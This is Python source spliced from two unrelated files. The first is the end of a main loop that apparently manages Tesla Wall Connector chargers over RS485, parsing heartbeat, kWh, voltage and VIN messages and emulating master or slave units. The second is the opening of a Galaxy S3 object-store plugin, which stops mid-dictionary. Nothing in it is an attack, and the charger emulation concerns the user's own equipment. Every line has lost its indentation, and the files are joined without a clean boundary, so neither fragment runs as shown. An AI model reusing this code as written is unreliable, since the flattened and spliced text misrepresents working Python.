# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if time.time() - master.getTimeLastTx() >= 1.0:
# It's been about a second since our last heartbeat.
if master.countSlaveTWC() > 0:
slaveTWC = master.getSlaveTWC(idxSlaveToSendNextHeartbeat)
if time.time() - slaveTWC.timeLastRx > 26:
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
logger.info(
"WARNING: We haven't heard from slave "
"%02X%02X for over 26 seconds. "
"Stop sending them heartbeat messages."
% (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
)
master.deleteSlaveTWC(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if idxSlaveToSendNextHeartbeat >= master.countSlaveTWC():
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if (
config["config"]["fakeMaster"] != 2
and time.time() - master.getTimeLastTx() >= 10.0
):
logger.info(
"Advertise fake slave %02X%02X with sign %02X is "
"ready to link once per 10 seconds as long as master "
"hasn't sent a heartbeat in the last 10 seconds."
% (
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
master.send_slave_linkready()
# See if there's any message from the web interface.
if master.getModuleByName("WebIPCControl"):
master.getModuleByName("WebIPCControl").processIPC()
# If it has been more than 2 minutes since the last kWh value,
# queue the command to request it from slaves
if config["config"]["fakeMaster"] == 1 and (
(time.time() - master.lastkWhMessage) > (60 * 2)
):
master.lastkWhMessage = time.time()
master.queue_background_task({"cmd": "getLifetimekWh"})
# If it has been more than 1 minute since the last VIN query with no
# response, and if we haven't queried more than 5 times already for this
# slave TWC, repeat the query
master.retryVINQuery()
########################################################################
# See if there's an incoming message on the input interface.
timeMsgRxStart = time.time()
actualDataLen = 0
while True:
now = time.time()
dataLen = master.getInterfaceModule().getBufferLen()
if dataLen == 0:
if msgLen == 0:
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if now - timeMsgRxStart >= 2.0:
logger.log(
logging.INFO9,
"Msg timeout ("
+ hex_str(ignoredData)
+ ") "
+ hex_str(msg[0:msgLen]),
)
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
actualDataLen = dataLen
dataLen = 1
data = master.getInterfaceModule().read(dataLen)
if dataLen != 1:
# This should never happen
logger.info("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if msgLen == 0 and len(data) > 0 and data[0] != 0xC0:
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
logger.log(
logging.DEBUG2, "Ignoring byte %02X between messages." % (data[0])
)
ignoredData += data
continue
elif msgLen > 0 and msgLen < 15 and len(data) > 0 and data[0] == 0xC0:
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
logger.debug(
"Found end of message before full-length message received. "
"Discard and wait for new message."
)
msg = data
msgLen = 1
continue
elif dataLen and len(data) == 0:
logger.error(
"We received a buffer length of %s from the RS485 module, but data buffer length is %s. This should not occur."
% (str(actualDataLen), str(len(data)))
)
if msgLen == 0:
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in sendMsg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if msgLen >= 16 and data[0] == 0xC0:
break
if msgLen >= 16:
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
# len($msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if (
master.lastTWCResponseMsg == b""
and msg[0:2] != b"\xFB\xE0"
and msg[0:2] != b"\xFD\xE0"
and msg[0:2] != b"\xFC\xE1"
and msg[0:2] != b"\xFB\xE2"
and msg[0:2] != b"\xFD\xE2"
and msg[0:2] != b"\xFB\xEB"
and msg[0:2] != b"\xFD\xEB"
and msg[0:2] != b"\xFD\xE0"
):
master.lastTWCResponseMsg = msg
logger.log(
logging.INFO9,
"Rx@" + ": (" + hex_str(ignoredData) + ") " + hex_str(msg) + "",
)
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if len(msg) != 14 and len(msg) != 16 and len(msg) != 20:
logger.info(
"ERROR: Ignoring message of unexpected length %d: %s"
% (len(msg), hex_str(msg))
)
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if (checksum & 0xFF) != checksumExpected:
logger.info(
"ERROR: Checksum %X does not match %02X. Ignoring message: %s"
% (checksum, checksumExpected, hex_str(msg))
)
continue
if config["config"]["fakeMaster"] == 1:
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b"^\xfd\xb1(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Start command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(b"^\xfd\xb2(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Stop command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(
b"^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if maxAmps >= 80:
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
master.setSpikeAmps(21)
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
master.setSpikeAmps(16)
if senderID == fakeTWCID:
logger.info(
"Slave TWC %02X%02X reports same TWCID as master. "
"Slave should resolve by changing its TWCID."
% (senderID[0], senderID[1])
)
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
# 10 to make the idle code at the top of the for()
# loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = master.newSlave(senderID, maxAmps)
if (
slaveTWC.protocolVersion == 1
and slaveTWC.minAmpsTWCSupports == 6
):
if len(msg) == 14:
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif len(msg) == 16:
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
logger.info(
"Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d."
% (
senderID[0],
senderID[1],
slaveTWC.protocolVersion,
slaveTWC.minAmpsTWCSupports,
)
)
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if slaveTWC.wiringMaxAmps > maxAmps:
logger.info(
"\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(config["config"]["wiringMaxAmpsPerTWC"])
+ " which is greater than the max "
+ str(maxAmps)
+ " amps your charger says it can handle. "
"Please review instructions in the source code and consult an "
"electrician if you don't know what to do."
)
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ""
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
# second, so we do the same near the top of this for()
# loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = master.getSlaveByID(senderID)
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
logger.info(
"ERROR: Received heartbeat message from "
"slave %02X%02X that we've not met before."
% (senderID[0], senderID[1])
)
continue
if fakeTWCID == receiverID:
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
logger.info(
"WARNING: Slave TWC %02X%02X status data: "
"%s sent to unknown TWC %02X%02X."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
)
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(....)(..)(..)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
lifetimekWh = msgMatch.group(2)
kWh = (
(lifetimekWh[0] << 24)
+ (lifetimekWh[1] << 16)
+ (lifetimekWh[2] << 8)
+ lifetimekWh[3]
)
vPhaseA = msgMatch.group(3)
voltsPhaseA = (vPhaseA[0] << 8) + vPhaseA[1]
vPhaseB = msgMatch.group(4)
voltsPhaseB = (vPhaseB[0] << 8) + vPhaseB[1]
vPhaseC = msgMatch.group(5)
voltsPhaseC = (vPhaseC[0] << 8) + vPhaseC[1]
data = msgMatch.group(6)
logger.info(
"Slave TWC %02X%02X: Delivered %d kWh, voltage per phase: (%d, %d, %d).",
senderID[0],
senderID[1],
kWh,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
extra={
"logtype": "slave_status",
"TWCID": senderID,
"kWh": kWh,
"voltsPerPhase": [voltsPhaseA, voltsPhaseB, voltsPhaseC],
},
)
# Update the timestamp of the last reciept of this message
master.lastkWhMessage = time.time()
# Every time we get this message, we re-queue the query
master.queue_background_task({"cmd": "getLifetimekWh"})
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
else:
msgMatch = re.search(
b"\A\xfd(\xee|\xef|\xf1)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Get 7 characters of VIN from slave. (XE is first 7, XF second 7)
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EE <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Response message is FD EE <Slave TWCID> VV VV VV VV VV VV VV where VV is an ascii character code
# representing a letter or number. VV will be all zero when car CAN communication is disabled
# (DIP switch 2 down) or when a non-Tesla vehicle is plugged in using something like a JDapter.
foundMsgMatch = True
vinPart = msgMatch.group(1)
senderID = msgMatch.group(2)
data = msgMatch.group(3)
logger.log(
logging.INFO6,
"Slave TWC %02X%02X reported VIN data: %s."
% (senderID[0], senderID[1], hex_str(data)),
)
slaveTWC = master.getSlaveByID(senderID)
if vinPart == b"\xee":
vinPart = 0
if vinPart == b"\xef":
vinPart = 1
if vinPart == b"\xf1":
vinPart = 2
slaveTWC.VINData[vinPart] = data.decode("utf-8").rstrip("\x00")
if vinPart < 2:
vinPart += 1
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": senderID,
"vinPart": str(vinPart),
}
)
else:
potentialVIN = "".join(slaveTWC.VINData)
# Ensure we have a valid VIN
if len(potentialVIN) == 17:
# Record Vehicle VIN
slaveTWC.currentVIN = potentialVIN
# Clear VIN retry timer
slaveTWC.lastVINQuery = 0
slaveTWC.vinQueryAttempt = 0
# Record this vehicle being connected
master.recordVehicleVIN(slaveTWC)
# Send VIN data to Status modules
master.updateVINStatus()
# Establish if this VIN should be able to charge
# If not, send stop command
master.queue_background_task(
{
"cmd": "checkVINEntitlement",
"subTWC": slaveTWC,
}
)
vinPart += 1
else:
# Unfortunately the VIN was not the right length.
# Re-request VIN
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": slaveTWC.TWCID,
"vinPart": 0,
}
)
logger.log(
logging.INFO6,
"Current VIN string is: %s at part %d."
% (str(slaveTWC.VINData), vinPart),
)
else:
msgMatch = re.search(
b"\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
foundMsgMatch = True
logger.info(
"ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. "
"Search installation instruction PDF for 'rotary switch' and set "
"switch so its arrow points to F on the dial."
)
if foundMsgMatch == False:
logger.info(
"*** UNKNOWN MESSAGE FROM SLAVE:"
+ hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com "
"with a copy of this error."
)
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(
b"\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready1. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(
b"\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready2. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
else:
msgMatch = re.search(
b"\A\xfb\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
master.setMasterTWCID(senderID)
try:
slaveTWC = master.slaveTWCs[receiverID]
except KeyError:
slaveTWC = master.newSlave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if receiverID != fakeTWCID:
# This message was intended for another slave.
# Ignore it.
logger.log(
logging.DEBUG2,
"Master %02X%02X sent "
"heartbeat message %s to receiver %02X%02X "
"that isn't our fake slave."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
),
)
continue
amps = (
master.slaveHeartbeatData[1] << 8
) + master.slaveHeartbeatData[2]
master.addkWhDelivered(
(master.convertAmpsToWatts(amps / 100) / 1000 / 60 / 60)
* (now - timeLastkWhDelivered)
)
timeLastkWhDelivered = now
if time.time() - timeLastkWhSaved >= 300.0:
timeLastkWhSaved = now
logger.log(
logging.INFO9,
"Fake slave has delivered %.3fkWh"
% (master.getkWhDelivered()),
)
# Save settings to file
master.queue_background_task({"cmd": "saveSettings"})
if heartbeatData[0] == 0x07:
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
master.slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif heartbeatData[0] == 0x06:
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
master.slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
master.slaveHeartbeatData[1] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[2] = amps & 0xFF
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif (
heartbeatData[0] == 0x05
or heartbeatData[0] == 0x08
or heartbeatData[0] == 0x09
):
if ((heartbeatData[1] << 8) + heartbeatData[2]) > 0:
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
master.slaveHeartbeatData[1] = heartbeatData[1]
master.slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
master.slaveHeartbeatData[3] = (ampsUsed >> 8) & 0xFF
master.slaveHeartbeatData[4] = ampsUsed & 0xFF
elif heartbeatData[0] == 0:
if timeTo0Aafter06 > 0 and timeTo0Aafter06 < now:
timeTo0Aafter06 = 0
master.slaveHeartbeatData[0] = 0x0A
elif timeToRaise2A > 0 and timeToRaise2A < now:
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
master.slaveHeartbeatData[0] = 0x0A
elif heartbeatData[0] == 0x02:
logger.info(
"Master heartbeat contains error %ld: %s"
% (heartbeatData[1], hex_str(heartbeatData))
)
else:
logger.info("UNKNOWN MHB state %s" % (hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(master.slaveHeartbeatData)
else:
msgMatch = re.search(
b"\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
logger.info("Received 2-hour idle message from Master.")
else:
msgMatch = re.search(
b"\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
master.newSlave(senderID, maxAmps)
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
try:
slaveTWC = master.slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = master.newSlave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(
b"\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage request message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.log(
logging.INFO8,
"VRQ from %02X%02X to %02X%02X"
% (senderID[0], senderID[1], receiverID[0], receiverID[1]),
)
if receiverID == fakeTWCID:
kWhCounter = int(master.getkWhDelivered())
kWhPacked = bytearray(
[
((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF),
]
)
logger.info(
"VRS %02X%02X: %dkWh (%s) %dV %dV %dV"
% (
fakeTWCID[0],
fakeTWCID[1],
kWhCounter,
hex_str(kWhPacked),
240,
0,
0,
)
)
master.getInterfaceModule().send(
bytearray(b"\xFD\xEB")
+ fakeTWCID
+ kWhPacked
+ bytearray(b"\x00\xF0\x00\x00\x00\x00\x00")
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(.........+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (
(data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
)
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage response message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.info(
"VRS %02X%02X: %dkWh %dV %dV %dV"
% (
senderID[0],
senderID[1],
kWhCounter,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
)
)
if foundMsgMatch == False:
logger.info("***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
logger.info("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
logger.info("Unhandled Exception:" + traceback.format_exc())
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Make sure any volatile data is written to disk before exiting
master.queue_background_task({"cmd": "saveSettings"})
# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.
master.backgroundTasksQueue.join()
# Close the input module
master.getInterfaceModule().close()
#
# End main program
#
##############################
|
s3.py | """
Object Store plugin for the Amazon Simple Storage Service (S3)
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectNotFound
from galaxy.util import string_as_bool, umask_fix_perms
from galaxy.util.directory_hash import directory_hash_id
from galaxy.util.sleeper import Sleeper
from .s3_multipart_upload import multipart_upload
from ..objectstore import ObjectStore, convert_bytes
try:
# Imports are done this way to allow objectstore code to be used outside of Galaxy.
import boto
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from boto.exception import S3ResponseError
except ImportError:
boto = None
NO_BOTO_ERROR_MESSAGE = ("S3/Swift object store configured, but no boto dependency available."
"Please install and properly configure boto or modify object store configuration.")
log = logging.getLogger( __name__ )
logging.getLogger('boto').setLevel(logging.INFO) # Otherwise boto is quite noisy
class S3ObjectStore(ObjectStore):
"""
Object store that stores objects as items in an AWS S3 bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and S3.
"""
def __init__(self, config, config_xml):
if boto is None:
raise Exception(NO_BOTO_ERROR_MESSAGE)
super(S3ObjectStore, self).__init__(config)
self.staging_path = self.config.file_path
self.transfer_progress = 0
self._parse_config_xml(config_xml)
self._configure_connection()
self.bucket = self._get_bucket(self.bucket)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
def _configure_connection(self):
log.debug("Configuring S3 Connection")
self.conn = S3Connection(self.access_key, self.secret_key)
def _parse_config_xml(self, config_xml):
try:
a_xml = config_xml.findall('auth')[0]
self.access_key = a_xml.get('access_key')
self.secret_key = a_xml.get('secret_key')
b_xml = config_xml.findall('bucket')[0]
self.bucket = b_xml.get('name')
self.use_rr = string_as_bool(b_xml.get('use_reduced_redundancy', "False"))
self.max_chunk_size = int(b_xml.get('max_chunk_size', 250))
cn_xml = config_xml.findall('connection')
if not cn_xml:
cn_xml = {}
else:
cn_xml = cn_xml[0]
self.host = cn_xml.get('host', None)
self.port = int(cn_xml.get('port', 6000))
self.multipart = string_as_bool(cn_xml.get('multipart', 'True'))
self.is_secure = string_as_bool(cn_xml.get('is_secure', 'True'))
self.conn_path = cn_xml.get('conn_path', '/')
c_xml = config_xml.findall('cache')[0]
self.cache_size = float(c_xml.get('size', -1))
self.staging_path = c_xml.get('path', self.config.object_store_cache_path)
for d_xml in config_xml.findall('extra_dir'):
self.extra_dirs[d_xml.get('type')] = d_xml.get('path')
log.debug("Object cache dir: %s", self.staging_path)
log.debug(" job work dir: %s", self.extra_dirs['job_work'])
# for multipart upload
self.s3server = {'access_key': self.access_key,
'secret_key': self.secret_key,
'is_secure': self.is_secure,
